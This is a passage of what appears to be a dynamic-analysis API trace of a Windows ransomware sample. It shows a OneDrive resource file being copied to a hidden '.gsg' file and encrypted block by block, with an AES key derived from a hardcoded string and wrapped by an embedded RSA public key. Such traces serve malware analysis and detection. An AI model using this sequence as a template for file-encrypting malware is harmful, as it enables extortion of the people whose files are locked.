(lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\az-latn-az\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\az-latn-az\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0272.971] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\az-latn-az\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\az-latn-az\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0272.972] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\az-latn-az\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0272.972] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f298e8) returned 1 [0272.974] CryptCreateHash (in: hProv=0x2f298e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0272.974] lstrlenA (lpString="VjnQjmgTDrnneBnnDhUveiykzMlQm") returned 29 [0272.974] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0272.974] CryptDeriveKey (in: hProv=0x2f298e8, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb108) returned 1 [0272.975] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0272.975] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0272.975] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f29a80) returned 1 [0272.975] CryptImportPublicKeyInfo (in: hCryptProv=0x2f29a80, dwCertEncodingType=0x1, pInfo=0x2f33a20*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f33a50*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f33a58*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fb148) returned 1 [0272.975] CryptEncrypt (in: hKey=0x2fb148, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0272.975] CryptEncrypt (in: hKey=0x2fb148, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f28d38*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f28d38*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0272.975] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f28d38*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f28d38*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0272.977] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.987] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.987] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.989] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.990] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.990] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.990] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.990] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.990] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.990] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.990] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.990] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.990] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.996] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.996] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.996] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.996] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.996] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.997] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.997] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.997] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.997] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.997] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.997] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.997] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.997] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.997] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.997] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.997] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.997] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.998] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.998] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.998] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.998] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.998] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.998] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.998] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.998] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.998] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.998] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.999] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.999] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.999] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.999] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.999] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.999] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.999] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.999] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.999] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.999] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.999] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.000] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.000] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.000] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.000] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.000] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.000] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.000] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.000] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.001] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.001] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.001] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.001] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.001] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.001] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.001] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.001] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.001] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.001] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.001] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.001] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.001] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.001] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.002] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.002] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.002] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.002] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.002] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.002] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.002] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.002] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.002] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.002] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.002] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.003] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.003] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, 